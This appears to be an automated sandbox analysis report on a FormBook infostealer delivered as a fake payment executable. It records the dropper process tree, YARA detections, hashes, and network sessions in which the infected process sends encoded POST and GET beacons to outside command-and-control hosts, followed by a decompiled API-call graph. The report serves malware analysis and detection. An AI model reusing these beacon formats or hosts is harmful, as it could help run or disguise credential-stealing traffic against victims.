                                                                                                                      Dec 7, 2023 13:45:32.073911905 CET1220INData Raw: 2f 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20 27 74 63 27 2c 0a 20 20 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 72 65 6c 61 74 65 64 73 65 61 72 63 68 27 2c
                                                                                                                      Data Ascii: // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14,
                                                                                                                      Dec 7, 2023 13:45:32.073960066 CET1220INData Raw: 20 20 20 20 20 76 61 72 20 61 64 74 65 73 74 3d 27 6f 66 66 27 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 69 66 28 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 21 3d 3d 6c
                                                                                                                      Data Ascii: var adtest='off'; </script><script type="text/javascript">if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=ZGY3MDExNzI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49753 | 144.217.103.3 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:45:45.826437950 CET | 700 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=iW9gG3QAuaVHIsc8cossbsX5Ch2rcxqXzalnAN5F+Rrr885utk2md3XhCXR2ja2CwgE/Tbs3CcqueNXSl3MiBFEBn5SbRlxKneE0Kcei2OEzmhAbbPv4PhK7OfMo3MYyrCcl8aw0X2y3rsvC0SqeXR+YMe3AwPwDaxc+WdD5x4H2ic17Fw==
Dec 7, 2023 13:45:46.129869938 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49754 | 144.217.103.3 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:45:48.517329931 CET | 720 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=iW9gG3QAuaVHKMs8PZssXcX6JB2rSRqbzapnAO1V/jPr/YxuumOmY3XhK3Q++q2Jwh4BTa83CcuueP/SlEkhAVEHuZSZPVxKneE0KcbN2OMznRwbbuv7MhK4JfMo8sY2rCcL8fVjX0K3ru3C0G2fZh+aRu2C/N5pUhxAZtPTtPu7upZoCHSzR+KIkOObN/XpNtvTgQk=
Dec 7, 2023 13:45:48.699510098 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:47 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49755 | 144.217.103.3 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:45:51.204389095 CET | 1733 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Origin: http://www.hmoatl.com
                                                                                                                      Referer: http://www.hmoatl.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:45:51.386885881 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:50 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49756 | 144.217.103.3 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:45:53.892265081 CET | 440 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.hmoatl.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:45:54.072010994 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:45:52 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49757 | 103.120.80.111 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:46:00.634841919 CET | 700 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=RqsFrtXqWIcU7Jq988r+PQSFFHkz+dHAIU9intYbXB/YQIixBISnMtNZ7/8YqGRut5nQGN+Q/xFC4SEODDfAWjqog9mmwifTTUcmfIUmi8dQw6Hz2ZkCy1TbtV1LMaPQ3drnZRBZrTZeH0E0r3VO2I37PdjQCG7KvLMVvqxcMazQeYsqtQ==


                                                                                                                      Session ID:50
                                                                                                                      Source IP:192.168.2.8
                                                                                                                      Source Port:49758
                                                                                                                      Destination IP:103.120.80.111
                                                                                                                      Destination Port:80
                                                                                                                      PID:6992
                                                                                                                      Process:C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Timestamp:Dec 7, 2023 13:46:03.510993958 CET
                                                                                                                      Bytes transferred:720
                                                                                                                      Direction:OUT
                                                                                                                      Data:POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=RqsFrtXqWIcU4oa9w7H+KwSGAHkzlNHEIU5inssLUybYRq6xANmnPtNZwf8ZkmRpt5qzGMCQ/xBC4T0OE0rPUzqq7tmk0ifTTUcmfIpDi91QwK3z34kD+VTUl11LdKPU3dqwZQNzrVVeHx40rmVJ4I3HSNjPHkautpVxrd5DE+WnbNA5qrY9AEenvd41bJ/bc0/nClQ=



                                                                                                                      Target ID:0
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:390'725 bytes
                                                                                                                      MD5 hash:1827B46843B0CF4502A0C0395914842D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\btpqr.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:168'960 bytes
                                                                                                                      MD5 hash:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:13:41:55
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:13:41:56
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\btpqr.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:168'960 bytes
                                                                                                                      MD5 hash:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:13:42:03
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe"
                                                                                                                      Imagebase:0x780000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:6
                                                                                                                      Start time:13:42:05
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Imagebase:0xe00000
                                                                                                                      File size:41'984 bytes
                                                                                                                      MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:13:42:16
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe"
                                                                                                                      Imagebase:0x780000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:10
                                                                                                                      Start time:13:42:30
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                      Imagebase:0x7ff6d20e0000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:17.1%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:21.8%
                                                                                                                        Total number of Nodes:1278
                                                                                                                        Total number of Limit Nodes:23
API calls 3490->3491 3492 401a49 3491->3492 3493 402a0c 18 API calls 3492->3493 3494 4019f3 3493->3494 3495 402648 3496 40264b 3495->3496 3500 402663 3495->3500 3497 402658 FindNextFileA 3496->3497 3498 4026a2 3497->3498 3497->3500 3501 405bc7 lstrcpynA 3498->3501 3501->3500 3505 401bca 3506 402a0c 18 API calls 3505->3506 3507 401bd1 3506->3507 3508 402a0c 18 API calls 3507->3508 3509 401bdb 3508->3509 3510 401beb 3509->3510 3511 402a29 18 API calls 3509->3511 3512 402a29 18 API calls 3510->3512 3516 401bfb 3510->3516 3511->3510 3512->3516 3513 401c06 3517 402a0c 18 API calls 3513->3517 3514 401c4a 3515 402a29 18 API calls 3514->3515 3518 401c4f 3515->3518 3516->3513 3516->3514 3519 401c0b 3517->3519 3521 402a29 18 API calls 3518->3521 3520 402a0c 18 API calls 3519->3520 3522 401c14 3520->3522 3523 401c58 FindWindowExA 3521->3523 3524 401c3a SendMessageA 3522->3524 3525 401c1c SendMessageTimeoutA 3522->3525 3526 401c76 3523->3526 3524->3526 3525->3526 3527 403fcb 3528 403fe1 3527->3528 3529 4040ee 3527->3529 3531 403e83 19 API calls 3528->3531 3530 40415d 3529->3530 3534 404231 3529->3534 3539 404132 GetDlgItem SendMessageA 3529->3539 3532 404167 GetDlgItem 3530->3532 3530->3534 3533 404037 3531->3533 3535 40417d 3532->3535 3536 4041ef 3532->3536 3537 403e83 19 API calls 3533->3537 3538 403eea 8 API calls 3534->3538 3535->3536 3543 4041a3 6 API calls 3535->3543 3536->3534 3544 404201 3536->3544 3541 404044 CheckDlgButton 3537->3541 3542 40422c 3538->3542 3558 403ea5 EnableWindow 3539->3558 3556 403ea5 EnableWindow 3541->3556 3543->3536 3547 404207 SendMessageA 3544->3547 3548 404218 3544->3548 3545 404158 3549 404256 SendMessageA 3545->3549 3547->3548 3548->3542 3551 40421e SendMessageA 3548->3551 3549->3530 3550 404062 GetDlgItem 3557 403eb8 SendMessageA 3550->3557 3551->3542 3553 404078 SendMessageA 3554 404096 GetSysColor 3553->3554 3555 40409f SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3553->3555 3554->3555 3555->3542 3556->3550 3557->3553 
3558->3545 3559 4024cf 3560 402a29 18 API calls 3559->3560 3561 4024d6 3560->3561 3564 40589e GetFileAttributesA CreateFileA 3561->3564 3563 4024e2 3564->3563 3027 401751 3065 402a29 3027->3065 3029 401758 3030 401776 3029->3030 3031 40177e 3029->3031 3093 405bc7 lstrcpynA 3030->3093 3094 405bc7 lstrcpynA 3031->3094 3034 40177c 3037 405e29 5 API calls 3034->3037 3035 401789 3036 4056ba 3 API calls 3035->3036 3038 40178f lstrcatA 3036->3038 3051 40179b 3037->3051 3038->3034 3039 405ec2 2 API calls 3039->3051 3040 40587f 2 API calls 3040->3051 3042 4017b2 CompareFileTime 3042->3051 3043 401876 3044 404eb3 25 API calls 3043->3044 3046 401880 3044->3046 3045 405bc7 lstrcpynA 3045->3051 3072 402e8e 3046->3072 3047 404eb3 25 API calls 3049 401862 3047->3049 3051->3039 3051->3040 3051->3042 3051->3043 3051->3045 3053 405be9 18 API calls 3051->3053 3064 40184d 3051->3064 3071 40589e GetFileAttributesA CreateFileA 3051->3071 3095 405488 3051->3095 3052 4018a7 SetFileTime 3054 4018b9 FindCloseChangeNotification 3052->3054 3053->3051 3054->3049 3055 4018ca 3054->3055 3056 4018e2 3055->3056 3057 4018cf 3055->3057 3059 405be9 18 API calls 3056->3059 3058 405be9 18 API calls 3057->3058 3062 4018d7 lstrcatA 3058->3062 3060 4018ea 3059->3060 3063 405488 MessageBoxIndirectA 3060->3063 3062->3060 3063->3049 3064->3047 3064->3049 3066 402a35 3065->3066 3067 405be9 18 API calls 3066->3067 3068 402a56 3067->3068 3069 402a62 3068->3069 3070 405e29 5 API calls 3068->3070 3069->3029 3070->3069 3071->3051 3074 402ea4 3072->3074 3073 402ed2 3099 4030b0 ReadFile 3073->3099 3074->3073 3101 4030e2 SetFilePointer 3074->3101 3078 403044 3081 403048 3078->3081 3082 403060 3078->3082 3079 402eef GetTickCount 3080 401893 3079->3080 3089 402f3e 3079->3089 3080->3052 3080->3054 3083 4030b0 ReadFile 3081->3083 3082->3080 3085 4030b0 ReadFile 3082->3085 3086 40307b WriteFile 3082->3086 3083->3080 3084 4030b0 ReadFile 3084->3089 3085->3082 3086->3080 3087 403090 3086->3087 3087->3080 3087->3082 3088 
402f94 GetTickCount 3088->3089 3089->3080 3089->3084 3089->3088 3090 402fb9 MulDiv wsprintfA 3089->3090 3091 402ff7 WriteFile 3089->3091 3092 404eb3 25 API calls 3090->3092 3091->3080 3091->3089 3092->3089 3093->3034 3094->3035 3098 40549d 3095->3098 3096 4054e9 3096->3051 3097 4054b1 MessageBoxIndirectA 3097->3096 3098->3096 3098->3097 3100 402edd 3099->3100 3100->3078 3100->3079 3100->3080 3101->3073 3565 401651 3566 402a29 18 API calls 3565->3566 3567 401657 3566->3567 3568 405ec2 2 API calls 3567->3568 3569 40165d 3568->3569 3570 401951 3571 402a0c 18 API calls 3570->3571 3572 401958 3571->3572 3573 402a0c 18 API calls 3572->3573 3574 401962 3573->3574 3575 402a29 18 API calls 3574->3575 3576 40196b 3575->3576 3577 40197e lstrlenA 3576->3577 3579 4019b9 3576->3579 3578 401988 3577->3578 3578->3579 3583 405bc7 lstrcpynA 3578->3583 3581 4019a2 3581->3579 3582 4019af lstrlenA 3581->3582 3582->3579 3583->3581 3584 4019d2 3585 402a29 18 API calls 3584->3585 3586 4019d9 3585->3586 3587 402a29 18 API calls 3586->3587 3588 4019e2 3587->3588 3589 4019e9 lstrcmpiA 3588->3589 3590 4019fb lstrcmpA 3588->3590 3591 4019ef 3589->3591 3590->3591 3592 402053 3593 402a29 18 API calls 3592->3593 3594 40205a 3593->3594 3595 402a29 18 API calls 3594->3595 3596 402064 3595->3596 3597 402a29 18 API calls 3596->3597 3598 40206d 3597->3598 3599 402a29 18 API calls 3598->3599 3600 402077 3599->3600 3601 402a29 18 API calls 3600->3601 3603 402081 3601->3603 3602 402095 CoCreateInstance 3607 4020b4 3602->3607 3609 40216a 3602->3609 3603->3602 3604 402a29 18 API calls 3603->3604 3604->3602 3605 401423 25 API calls 3606 40219c 3605->3606 3608 402149 MultiByteToWideChar 3607->3608 3607->3609 3608->3609 3609->3605 3609->3606 3610 402256 3611 402264 3610->3611 3612 40225e 3610->3612 3614 402274 3611->3614 3615 402a29 18 API calls 3611->3615 3613 402a29 18 API calls 3612->3613 3613->3611 3616 402282 3614->3616 3618 402a29 18 API calls 3614->3618 3615->3614 3617 402a29 18 API calls 3616->3617 
